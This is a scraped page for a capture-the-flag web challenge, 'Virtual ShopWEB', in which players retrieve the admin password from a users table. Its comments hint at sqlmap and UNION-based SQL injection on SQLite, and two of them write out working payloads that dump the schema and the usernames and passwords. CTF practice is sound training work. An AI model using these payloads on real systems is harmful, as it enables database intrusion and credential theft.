Virtual ShopWEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
heyile
一血奖励:
0金币
解 决:
174
提 示:
描 述:
So, let's see if you can retrieve the `password` of the admin which\
\ `username` is 'admin' among all the available `users` in the db\n\n\n **Author**:\
\ F100w"
评分(0)
暂无评分
解题动态
miko88 攻破了该题 2天前
寻找核弹 攻破了该题 2天前
173360290 攻破了该题 3天前
refrain001 攻破了该题 5天前
bu5yer 攻破了该题 6天前
skyhigh 攻破了该题 7天前
Jupiter 攻破了该题 7天前
XmN<=GzR 攻破了该题 9天前
Kevin_xiao 攻破了该题 11天前
fuhuameng 攻破了该题 12天前
Aiminsun 攻破了该题 19天前
defguiahhg 攻破了该题 20天前
5120213588 攻破了该题 22天前
brucelsone 攻破了该题 25天前
ve9etable 攻破了该题 27天前
469519673 攻破了该题 1月前
小白小白 攻破了该题 1月前
wangjf 攻破了该题 1月前
amobaishi 攻破了该题 1月前
评论
WCRH 2月前
举报
鬼知道没有登录页面也有sql注入,实在没想的
15614005380 5月前
举报
只用sqlmap就可以做出来,很简单的一个注入
FADogeCTF 6月前
举报
union查询
xiaobai568 7月前
举报
前面的太复杂了吧,-1'union select (select password from users where username='admin'),5,3,4 -- 直接就出来了
JJhello 7月前
举报
sqlmap即可
chaoge 8月前
举报
sqlite,弄了半天认为是MySQL呢。
justsosoloveyou 9月前
举报
' UNION SELECT (select group_concat(sql) from sqlite_master WHERE type='table'),NULL,NULL,(select group_concat(username||':'||password) FROM users)--+
SS3B 9月前
举报
sqlmap一下子就出来了
hopeinhand 10月前
举报
联合查询注入,表名、列名、用户名全给了,都没啥好说的了